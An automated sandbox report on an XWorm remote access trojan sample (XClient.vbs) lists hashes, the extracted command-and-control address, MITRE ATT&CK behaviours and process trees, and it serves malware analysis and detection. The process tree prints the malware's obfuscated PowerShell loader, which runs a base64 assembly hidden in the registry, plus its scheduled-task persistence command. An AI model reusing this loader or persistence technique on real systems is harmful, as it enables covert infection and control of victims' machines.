xworm | 79ba69baace5e2b30cdc18e8ab462692e3337640f52f532743ffb2a52c281694

Analysis

max time kernel
146s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2024, 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.vbs
Size

51KB
MD5

b2d3d950c164eac3905adf7449bbc102
SHA1

bfa01bfaa12aefce0bc8f7468ce788d78623c56d
SHA256

79ba69baace5e2b30cdc18e8ab462692e3337640f52f532743ffb2a52c281694
SHA512

6032364e7b7e107f0813eee20304ec31e65747b10174fba9d703d20c010c8785df515a0789f8e813484ae7d09e972100b2dd08df46dcb0844e9911feddadab74
SSDEEP

1536:daxTfSWi9SkelLyAPh0voJKfI2rygScsddWZrv+Va:0xTfk9reVUvWII2oJdWZT+Va

Score

10^/10

xworm execution persistence ransomware rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

modern-educators.gl.at.ply.gg:23695

Mutex

sbhJrC2cDjOcP2gL

Attributes

Install_directory
%Userprofile%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/412-15-0x000002649A720000-0x000002649A730000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
20	412	powershell.exe
23	412	powershell.exe
43	412	powershell.exe
62	412	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4532	Windows backup

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
412	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
412	powershell.exe
412	powershell.exe
4532	Windows backup
4532	Windows backup
4124	chrome.exe
4124	chrome.exe
3724	msedge.exe
3724	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
396	identity_helper.exe
396	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	4532	Windows backup
Token: SeManageVolumePrivilege	3616	svchost.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe
536	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 668 wrote to memory of 412	668	WScript.exe	86
PID 668 wrote to memory of 412	668	WScript.exe	86
PID 412 wrote to memory of 4872	412	powershell.exe	90
PID 412 wrote to memory of 4872	412	powershell.exe	90
PID 4124 wrote to memory of 4972	4124	chrome.exe	103
PID 4124 wrote to memory of 4972	4124	chrome.exe	103
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 692	4124	chrome.exe	104
PID 4124 wrote to memory of 5116	4124	chrome.exe	105
PID 4124 wrote to memory of 5116	4124	chrome.exe	105
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106
PID 4124 wrote to memory of 4924	4124	chrome.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XClient.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\XClient.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs'; $possessiveness = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $possessiveness = -join $possessiveness[-1..-$possessiveness.Length];[<##>AppDomain<##>]::<##>('merelsurrentDomain'.replace('merels','C'))<##>.<##>('liquationoad'.replace('liquation','L'))([Convert]::FromBase64String($possessiveness))<##>.<##>('microzoarianntryPoint'.replace('microzoarian','E'))<##>.<##>('Inconfrontmentoke'.replace('confrontment','v'))($Null,$Null)<##>;
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Adds Run key to start application
  - Sets desktop wallpaper using registry
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff04b446f8,0x7fff04b44708,0x7fff04b44718
      4⤵
      PID:1244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
      4⤵
      PID:620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3724
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
      4⤵
      PID:1612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
      4⤵
      PID:3180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
      4⤵
      PID:1964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
      4⤵
      PID:4288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
      4⤵
      PID:3088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
      4⤵
      PID:3652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
      4⤵
      PID:5072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10029665362922229481,211282730650823398,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      4⤵
      PID:2588

C:\Users\Admin\Windows backup
"C:\Users\Admin\Windows backup"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ffef5a4ab58,0x7ffef5a4ab68,0x7ffef5a4ab78
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:2
  2⤵
  PID:692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:8
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:1
  2⤵
  PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4532 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1936,i,5363498516387067989,7472668466847287554,131072 /prefetch:8
  2⤵
  PID:1244

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:2052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2728

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
7ae7d1cd2fb0f2a6091ed5381ebf3a74

SHA1
5f2955d7f1406db235d7c491375ced95faa8d695

SHA256
1b1744cfe31327b9b3c1bbfe6fcb2aaf70519c52bbd9bcb9d8783ddbe529cc0b

SHA512
0cbe3d7b6995334ba4a5ffb63d2874eeabd2c94c0eb51f4fa77d5a0b913a2c43b2e114e534bc04c177b4363619de29b695746aaea3a775d45883a15a84cdf4dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
4dbd4919355bd85c68fb8d58a18cc48c

SHA1
1b84196e899a110f7280846dfb46369a02a390ad

SHA256
06432fcec430ff941135a25c3a729da983b6aa3a7273542447013c910fbef803

SHA512
b6a75a5003d553c50acdf62be5051785bad0daeaf85f4dab2cca70531b64c0d6440844cc55c8f4a6936797d83f1aa945f5b4a1f9e10763d146f98c59c3256a7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
b892a6c1b74d2c12fb532bbfc835a7ab

SHA1
fd7f378fc98924f0364dfe90bcd5267d1d95b2d8

SHA256
59a5874a918a3cf30db091ab4430485393fbe08a39cc77c3539cd4942cd14311

SHA512
edb07223ef97a4628b3a23c30ef829bdb3144d1af46604af4838de5b95634fa4f7b343911e398f77ef3a3cc00b5c45a321ffa2545eabc63ddafb991388f71d80

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
183a0177ccf1168a2658fc31e3bc01f7

SHA1
c0b1bcd16215af1e44120a956b7b36c59f4a9d2e

SHA256
4c063b7d3638cac29345210c61e80545409e712a1e2b780283231e8b06df7a52

SHA512
eb69e5b4eb0005095d627d14d4f86a6799bc82d023fb784ad4b11bea3c64316b3fb1c1513a87cd96cc4eba046cb6f220f2b6ec17054f3648ab67e4717e670ccc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
